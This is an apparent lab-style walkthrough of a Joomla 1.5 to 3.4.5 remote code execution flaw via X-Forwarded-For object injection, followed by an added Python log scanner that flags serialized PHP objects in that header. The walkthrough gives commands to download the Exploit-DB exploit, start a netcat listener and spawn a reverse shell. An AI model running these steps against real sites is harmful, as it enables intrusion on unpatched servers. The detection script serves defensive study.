How to upload a shell in Joomla! 1.5 < 3.4.6

Joomla! 1.5 < 3.4.6 Remote Code Execution

Joomla! CMS versions from 1.5 up to (but not including) 3.4.6 allow object injection through the ‘x-forwarded-for’ header, which leads to remote code execution.

You can download the exploit from Exploit-DB using:

  • wget https://www.exploit-db.com/download/39033 -O exploit.py

Then we need to set up a TCP listener on port 1234:

  • nc -nlvp 1234

Now everything should be ready; we just need to specify the LHOST and the port, then run the exploit to spawn a reverse shell:

  • python joomla-rce-2-shell.py -t http://10.10.10.116/ -l 10.10.14.7 -p 1234
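
Seen from the defending side, the injected input is a header that should only ever carry IP addresses, so access logs can be checked for values that are anything else. The script below is an added example, not part of the original post or of the Exploit-DB code; the log layout, the sample lines and the function names are assumptions made for the illustration.

```python
import ipaddress
import re

# Assumed layout (constructed for this example): an Apache-style access log
# whose last quoted field is the X-Forwarded-For request header, e.g.
#   LogFormat "%h %t \"%r\" %>s \"%{X-Forwarded-For}i\""
LINE_RE = re.compile(
    r'^(?P<peer>\S+) \[[^\]]+\] "[^"]*" \d{3} "(?P<xff>(?:[^"\\]|\\.)*)"$'
)
# Generic PHP serialize() object marker: O:<len>:"Class" or C:<len>:"Class".
PHP_OBJECT_RE = re.compile(r'[OC]:\d+:"')

# Constructed sample lines (documentation addresses, harmless header values).
SAMPLE_LOG = [
    '198.51.100.7 [01/Jan/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 "-"',
    '198.51.100.7 [01/Jan/2024:10:01:05 +0000] "GET / HTTP/1.1" 200 "203.0.113.9, 10.0.0.2"',
    '192.0.2.44 [01/Jan/2024:10:02:11 +0000] "GET / HTTP/1.1" 200 "O:8:\\"stdClass\\":0:{}"',
    '192.0.2.44 [01/Jan/2024:10:02:12 +0000] "GET / HTTP/1.1" 200 "not-an-ip"',
]

def classify_xff(value):
    """Return 'absent', 'ok', 'php-object' or 'malformed' for one header value."""
    if value in ("", "-"):
        return "absent"
    if PHP_OBJECT_RE.search(value):
        return "php-object"
    for hop in value.split(","):
        try:
            ipaddress.ip_address(hop.strip())  # every hop must be a bare IP
        except ValueError:
            return "malformed"
    return "ok"

def scan(lines):
    """Return (line number, verdict, peer address) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = LINE_RE.match(line.rstrip("\n"))
        if not match:
            findings.append((lineno, "unparsed", None))
            continue
        xff = match["xff"].replace('\\"', '"')  # undo the log's quote escaping
        verdict = classify_xff(xff)
        if verdict in ("php-object", "malformed"):
            findings.append((lineno, verdict, match["peer"]))
    return findings

if __name__ == "__main__":
    for lineno, verdict, peer in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict} X-Forwarded-For from {peer}")
```

The same `classify_xff` check can sit in a reverse proxy or WAF rule to reject the request outright instead of only reporting it afterwards.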

Happy Hacking!
